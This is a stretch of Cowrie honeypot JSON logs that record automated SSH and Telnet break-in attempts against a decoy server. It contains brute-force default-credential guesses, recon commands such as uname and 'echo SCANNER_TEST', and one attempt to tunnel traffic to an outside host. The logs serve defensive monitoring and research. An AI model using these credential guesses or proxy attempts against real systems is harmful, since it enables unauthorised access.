{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T10:16:15.958775Z","src_ip":"51.79.164.132","session":"5052d64fd05f"}
{"eventid":"cowrie.login.failed","username":"nvidia","password":"nvidia","message":"login attempt [nvidia/nvidia] failed","sensor":"my-vps","timestamp":"2025-08-28T10:16:17.615870Z","src_ip":"51.79.164.132","session":"5052d64fd05f"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:16:19.015853Z","src_ip":"51.79.164.132","session":"5052d64fd05f"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":46622,"dst_ip":"1.2.3.4","dst_port":22,"session":"8db2aebc3bb0","protocol":"ssh","message":"New connection: 51.79.164.132:46622 (1.2.3.4:22) [session: 8db2aebc3bb0]","sensor":"my-vps","timestamp":"2025-08-28T10:16:41.506687Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:16:41.703077Z","src_ip":"51.79.164.132","session":"8db2aebc3bb0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T10:16:41.704079Z","src_ip":"51.79.164.132","session":"8db2aebc3bb0"}
{"eventid":"cowrie.login.success","username":"root","password":"123456789","message":"login attempt [root/123456789] succeeded","sensor":"my-vps","timestamp":"2025-08-28T10:16:43.641565Z","src_ip":"51.79.164.132","session":"8db2aebc3bb0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T10:16:44.600540Z","src_ip":"51.79.164.132","session":"8db2aebc3bb0"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T10:16:44.601274Z","src_ip":"51.79.164.132","session":"8db2aebc3bb0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:16:45.061898Z","src_ip":"51.79.164.132","session":"8db2aebc3bb0"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:16:45.062977Z","src_ip":"51.79.164.132","session":"8db2aebc3bb0"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":43968,"dst_ip":"1.2.3.4","dst_port":22,"session":"b1eab44f2b04","protocol":"ssh","message":"New connection: 51.79.164.132:43968 (1.2.3.4:22) [session: b1eab44f2b04]","sensor":"my-vps","timestamp":"2025-08-28T10:17:08.133402Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:17:08.340644Z","src_ip":"51.79.164.132","session":"b1eab44f2b04"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T10:17:08.349412Z","src_ip":"51.79.164.132","session":"b1eab44f2b04"}
{"eventid":"cowrie.login.success","username":"root","password":"rootroot","message":"login attempt [root/rootroot] succeeded","sensor":"my-vps","timestamp":"2025-08-28T10:17:10.948527Z","src_ip":"51.79.164.132","session":"b1eab44f2b04"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T10:17:11.985005Z","src_ip":"51.79.164.132","session":"b1eab44f2b04"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T10:17:11.985861Z","src_ip":"51.79.164.132","session":"b1eab44f2b04"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:17:12.178106Z","src_ip":"51.79.164.132","session":"b1eab44f2b04"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:17:12.179348Z","src_ip":"51.79.164.132","session":"b1eab44f2b04"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":33144,"dst_ip":"1.2.3.4","dst_port":22,"session":"0c4800b44def","protocol":"ssh","message":"New connection: 51.79.164.132:33144 (1.2.3.4:22) [session: 0c4800b44def]","sensor":"my-vps","timestamp":"2025-08-28T10:17:34.428646Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:17:34.741903Z","src_ip":"51.79.164.132","session":"0c4800b44def"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T10:17:34.742728Z","src_ip":"51.79.164.132","session":"0c4800b44def"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":58752,"dst_ip":"1.2.3.4","dst_port":22,"session":"e3e4ff7a6852","protocol":"ssh","message":"New connection: 217.72.205.35:58752 (1.2.3.4:22) [session: e3e4ff7a6852]","sensor":"my-vps","timestamp":"2025-08-28T10:17:35.976366Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:17:35.977435Z","src_ip":"217.72.205.35","session":"e3e4ff7a6852"}
{"eventid":"cowrie.login.failed","username":"es","password":"es123","message":"login attempt [es/es123] failed","sensor":"my-vps","timestamp":"2025-08-28T10:17:38.628398Z","src_ip":"51.79.164.132","session":"0c4800b44def"}
{"eventid":"cowrie.session.closed","duration":"6.0","message":"Connection lost after 6.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:17:40.471732Z","src_ip":"51.79.164.132","session":"0c4800b44def"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":35790,"dst_ip":"1.2.3.4","dst_port":22,"session":"539c312eae66","protocol":"ssh","message":"New connection: 51.79.164.132:35790 (1.2.3.4:22) [session: 539c312eae66]","sensor":"my-vps","timestamp":"2025-08-28T10:18:00.807397Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:18:01.015648Z","src_ip":"51.79.164.132","session":"539c312eae66"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T10:18:01.016458Z","src_ip":"51.79.164.132","session":"539c312eae66"}
{"eventid":"cowrie.login.failed","username":"sugi","password":"sugi","message":"login attempt [sugi/sugi] failed","sensor":"my-vps","timestamp":"2025-08-28T10:18:03.378765Z","src_ip":"51.79.164.132","session":"539c312eae66"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:18:04.672698Z","src_ip":"51.79.164.132","session":"539c312eae66"}
{"eventid":"cowrie.session.closed","duration":"300.8","message":"Connection lost after 300.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:20:47.269339Z","src_ip":"116.198.207.211","session":"d8eddb184d3b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":14649,"dst_ip":"1.2.3.4","dst_port":22,"session":"ed6d9c4508cb","protocol":"ssh","message":"New connection: 212.227.235.229:14649 (1.2.3.4:22) [session: ed6d9c4508cb]","sensor":"my-vps","timestamp":"2025-08-28T10:20:56.798225Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:20:56.799701Z","src_ip":"212.227.235.229","session":"ed6d9c4508cb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":15001,"dst_ip":"1.2.3.4","dst_port":22,"session":"1724d484abcd","protocol":"ssh","message":"New connection: 212.227.235.229:15001 (1.2.3.4:22) [session: 1724d484abcd]","sensor":"my-vps","timestamp":"2025-08-28T10:20:56.954979Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:20:56.955959Z","src_ip":"212.227.235.229","session":"1724d484abcd"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T10:20:57.112874Z","src_ip":"212.227.235.229","session":"1724d484abcd"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T10:20:57.587234Z","src_ip":"212.227.235.229","session":"1724d484abcd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T10:20:57.745155Z","session":"1724d484abcd"}
{"eventid":"cowrie.session.connect","src_ip":"193.32.162.145","src_port":42766,"dst_ip":"1.2.3.4","dst_port":22,"session":"19f8899b4b59","protocol":"ssh","message":"New connection: 193.32.162.145:42766 (1.2.3.4:22) [session: 19f8899b4b59]","sensor":"my-vps","timestamp":"2025-08-28T10:21:43.317691Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:21:43.318612Z","src_ip":"193.32.162.145","session":"19f8899b4b59"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T10:21:43.349151Z","src_ip":"193.32.162.145","session":"19f8899b4b59"}
{"eventid":"cowrie.login.failed","username":"jito","password":"jito","message":"login attempt [jito/jito] failed","sensor":"my-vps","timestamp":"2025-08-28T10:21:43.440846Z","src_ip":"193.32.162.145","session":"19f8899b4b59"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:21:44.472682Z","src_ip":"193.32.162.145","session":"19f8899b4b59"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46394,"dst_ip":"1.2.3.4","dst_port":23,"session":"a98f86c028cc","protocol":"telnet","message":"New connection: 212.227.235.229:46394 (1.2.3.4:23) [session: a98f86c028cc]","sensor":"my-vps","timestamp":"2025-08-28T10:22:02.226827Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-28T10:22:02.630438Z","src_ip":"212.227.235.229","session":"a98f86c028cc"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-28T10:22:04.064614Z","src_ip":"212.227.235.229","session":"a98f86c028cc"}
{"eventid":"cowrie.session.closed","duration":3.8380959033966064,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:22:06.064840Z","src_ip":"212.227.235.229","session":"a98f86c028cc"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:22:06.955044Z","src_ip":"212.227.235.229","session":"1724d484abcd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35390,"dst_ip":"1.2.3.4","dst_port":23,"session":"236cb8577225","protocol":"telnet","message":"New connection: 212.227.235.229:35390 (1.2.3.4:23) [session: 236cb8577225]","sensor":"my-vps","timestamp":"2025-08-28T10:22:07.233027Z"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-28T10:22:07.603462Z","src_ip":"212.227.235.229","session":"236cb8577225"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T10:22:08.078416Z","src_ip":"212.227.235.229","session":"236cb8577225"}
{"eventid":"cowrie.command.input","input":"","message":"CMD: ","sensor":"my-vps","timestamp":"2025-08-28T10:22:08.107083Z","src_ip":"212.227.235.229","session":"236cb8577225"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-28T10:22:08.266765Z","src_ip":"212.227.235.229","session":"236cb8577225"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/2a92b38f913f60f0c4e78b38c7c06273ebdbb6887a1be6a5b77a53775a395aa0","size":514,"shasum":"2a92b38f913f60f0c4e78b38c7c06273ebdbb6887a1be6a5b77a53775a395aa0","duplicate":false,"duration":"1.2","message":"Closing TTY Log: var/lib/cowrie/tty/2a92b38f913f60f0c4e78b38c7c06273ebdbb6887a1be6a5b77a53775a395aa0 after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:22:09.267629Z","src_ip":"212.227.235.229","session":"236cb8577225"}
{"eventid":"cowrie.session.closed","duration":2.039379835128784,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:22:09.272351Z","src_ip":"212.227.235.229","session":"236cb8577225"}
{"eventid":"cowrie.session.connect","src_ip":"119.123.90.149","src_port":53629,"dst_ip":"1.2.3.4","dst_port":23,"session":"30febb6dcf04","protocol":"telnet","message":"New connection: 119.123.90.149:53629 (1.2.3.4:23) [session: 30febb6dcf04]","sensor":"my-vps","timestamp":"2025-08-28T10:22:34.722902Z"}
{"eventid":"cowrie.session.closed","duration":34.87607407569885,"message":"Connection lost after 34 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:23:09.598899Z","src_ip":"119.123.90.149","session":"30febb6dcf04"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":1527,"dst_ip":"1.2.3.4","dst_port":22,"session":"a2e82c3fa982","protocol":"ssh","message":"New connection: 80.94.95.15:1527 (1.2.3.4:22) [session: a2e82c3fa982]","sensor":"my-vps","timestamp":"2025-08-28T10:23:12.541791Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T10:23:12.545846Z","src_ip":"80.94.95.15","session":"a2e82c3fa982"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T10:23:12.615142Z","src_ip":"80.94.95.15","session":"a2e82c3fa982"}
